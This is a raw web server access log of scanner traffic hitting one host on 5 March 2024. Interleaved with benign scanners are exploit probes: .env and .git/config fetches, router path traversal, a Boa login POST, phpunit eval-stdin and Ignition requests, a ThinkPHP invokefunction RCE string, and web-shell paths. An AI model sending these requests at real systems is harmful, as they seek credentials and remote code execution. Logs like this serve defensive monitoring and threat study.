51.159.103.14 - - [05/Mar/2024:03:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
51.159.103.14 - - [05/Mar/2024:03:46:24 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
162.142.125.215 - - [05/Mar/2024:03:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.215 - - [05/Mar/2024:03:47:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.215 - - [05/Mar/2024:03:47:34 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.215 - - [05/Mar/2024:03:47:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
198.235.24.233 - - [05/Mar/2024:03:49:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
79.110.62.197 - - [05/Mar/2024:03:51:40 +0100] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
71.6.134.232 - - [05/Mar/2024:03:55:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
38.68.46.66 - - [05/Mar/2024:03:58:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
38.68.46.66 - - [05/Mar/2024:03:58:23 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
167.94.138.51 - - [05/Mar/2024:04:00:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.51 - - [05/Mar/2024:04:00:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [05/Mar/2024:04:00:15 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.51 - - [05/Mar/2024:04:00:15 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
94.156.66.125 - - [05/Mar/2024:04:04:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
71.6.134.232 - - [05/Mar/2024:04:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
94.156.66.125 - - [05/Mar/2024:04:09:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
71.6.134.232 - - [05/Mar/2024:04:10:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
35.187.98.121 - - [05/Mar/2024:04:12:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.187.98.121 - - [05/Mar/2024:04:14:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
130.211.54.158 - - [05/Mar/2024:04:15:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
130.211.54.158 - - [05/Mar/2024:04:15:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
130.211.54.158 - - [05/Mar/2024:04:15:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
130.211.54.158 - - [05/Mar/2024:04:16:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.140.130.61 - - [05/Mar/2024:04:16:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
94.156.66.125 - - [05/Mar/2024:04:19:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
34.76.96.55 - - [05/Mar/2024:04:21:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.76.96.55 - - [05/Mar/2024:04:21:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:21 +0100] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:22 +0100] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:22 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:22 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.25.102 - - [05/Mar/2024:04:21:22 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
198.235.24.73 - - [05/Mar/2024:04:24:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
103.149.192.81 - - [05/Mar/2024:04:24:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
94.156.69.247 - - [05/Mar/2024:04:26:48 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.120.146 - - [05/Mar/2024:04:28:04 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
51.254.59.113 - - [05/Mar/2024:04:29:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.165.169.131 - - [05/Mar/2024:04:30:08 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
205.210.31.146 - - [05/Mar/2024:04:31:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.146 - - [05/Mar/2024:04:31:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
38.68.46.66 - - [05/Mar/2024:04:35:16 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
38.68.46.66 - - [05/Mar/2024:04:35:17 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
79.110.62.197 - - [05/Mar/2024:04:35:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
192.200.139.146 - - [05/Mar/2024:04:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
93.225.22.183 - - [05/Mar/2024:04:45:58 +0100] "O" 501 316 "-" "-"
64.62.197.8 - - [05/Mar/2024:04:48:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [05/Mar/2024:04:48:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.66.125 - - [05/Mar/2024:04:50:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
146.19.24.28 - - [05/Mar/2024:04:51:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:05:00:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:05:02:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:05:03:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.66.125 - - [05/Mar/2024:05:03:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
162.216.150.13 - - [05/Mar/2024:05:03:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.11 - - [05/Mar/2024:05:04:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
128.14.173.117 - - [05/Mar/2024:05:04:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
146.19.24.28 - - [05/Mar/2024:05:14:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:15:12 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:15:17 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
146.19.24.28 - - [05/Mar/2024:05:17:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.52 - - [05/Mar/2024:05:22:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.52 - - [05/Mar/2024:05:22:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.52 - - [05/Mar/2024:05:22:57 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.52 - - [05/Mar/2024:05:22:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
71.6.134.230 - - [05/Mar/2024:05:24:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:04 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:05 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:20 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:21 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:21 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:22 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:42 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.189.135 - - [05/Mar/2024:05:24:55 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
94.156.66.125 - - [05/Mar/2024:05:29:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
146.19.24.28 - - [05/Mar/2024:05:33:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
71.6.134.230 - - [05/Mar/2024:05:36:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
71.6.134.230 - - [05/Mar/2024:05:37:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
94.156.69.247 - - [05/Mar/2024:05:41:46 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
162.216.150.177 - - [05/Mar/2024:05:52:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.142.125.220 - - [05/Mar/2024:05:59:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.220 - - [05/Mar/2024:05:59:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.220 - - [05/Mar/2024:05:59:18 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.220 - - [05/Mar/2024:05:59:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
141.98.11.96 - - [05/Mar/2024:06:03:05 +0100] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
35.222.114.21 - - [05/Mar/2024:06:10:07 +0100] "POST /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:07 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:48 +0100] "GET /script HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:48 +0100] "GET /login HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:48 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:48 +0100] "GET /users/sign_in HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:49 +0100] "GET /wp-login.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:49 +0100] "GET /invoker/readonly HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
35.222.114.21 - - [05/Mar/2024:06:10:49 +0100] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=vt8jtgfo HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
141.98.11.96 - - [05/Mar/2024:06:12:24 +0100] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
141.98.11.96 - - [05/Mar/2024:06:12:59 +0100] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.28 - - [05/Mar/2024:06:15:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.96 - - [05/Mar/2024:06:21:29 +0100] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.28 - - [05/Mar/2024:06:22:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.96 - - [05/Mar/2024:06:24:04 +0100] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
141.98.11.96 - - [05/Mar/2024:06:31:21 +0100] "GET /../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
35.203.211.88 - - [05/Mar/2024:06:31:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
118.193.59.15 - - [05/Mar/2024:06:31:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
118.193.59.15 - - [05/Mar/2024:06:31:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
118.193.59.15 - - [05/Mar/2024:06:31:55 +0100] "t3 12.1.2" 400 329 "-" "-"
152.32.247.22 - - [05/Mar/2024:06:32:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/597.40 (KHTML, like Gecko) Chrome/105.0.953 Safari/537.36"
152.32.247.22 - - [05/Mar/2024:06:32:30 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_2) AppleWebKit/542.52 (KHTML, like Gecko) Chrome/50.0.252 Safari/537.36"
152.32.247.22 - - [05/Mar/2024:06:32:30 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 8_1_1; Win64; x64) AppleWebKit/566.37 (KHTML, like Gecko) Chrome/51.0.2212 Safari/537.36"
152.32.247.22 - - [05/Mar/2024:06:32:30 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_0) AppleWebKit/596.39 (KHTML, like Gecko) Chrome/104.0.309 Safari/537.36"
152.32.247.22 - - [05/Mar/2024:06:32:31 +0100] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
152.32.247.22 - - [05/Mar/2024:06:32:32 +0100] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
152.32.247.22 - - [05/Mar/2024:06:32:33 +0100] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
89.200.225.82 - - [05/Mar/2024:06:34:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.211.108 - - [05/Mar/2024:06:34:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [05/Mar/2024:06:37:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
189.173.11.221 - - [05/Mar/2024:06:40:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
184.105.247.252 - - [05/Mar/2024:06:40:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
185.191.126.213 - - [05/Mar/2024:06:41:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.82.47.2 - - [05/Mar/2024:06:41:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
198.235.24.149 - - [05/Mar/2024:06:42:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
184.105.247.252 - - [05/Mar/2024:06:43:24 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
94.156.69.247 - - [05/Mar/2024:06:43:44 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
103.149.192.242 - - [05/Mar/2024:06:43:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
74.82.47.2 - - [05/Mar/2024:06:43:51 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50"
184.105.247.252 - - [05/Mar/2024:06:44:30 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
74.82.47.2 - - [05/Mar/2024:06:44:43 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
185.191.126.213 - - [05/Mar/2024:06:48:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
1.234.136.11 - - [05/Mar/2024:06:51:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
89.200.229.43 - - [05/Mar/2024:06:51:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
79.110.62.197 - - [05/Mar/2024:06:55:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
141.98.11.96 - - [05/Mar/2024:06:56:28 +0100] "GET /../../mnt/mtd/Config/Account2 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [05/Mar/2024:06:57:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
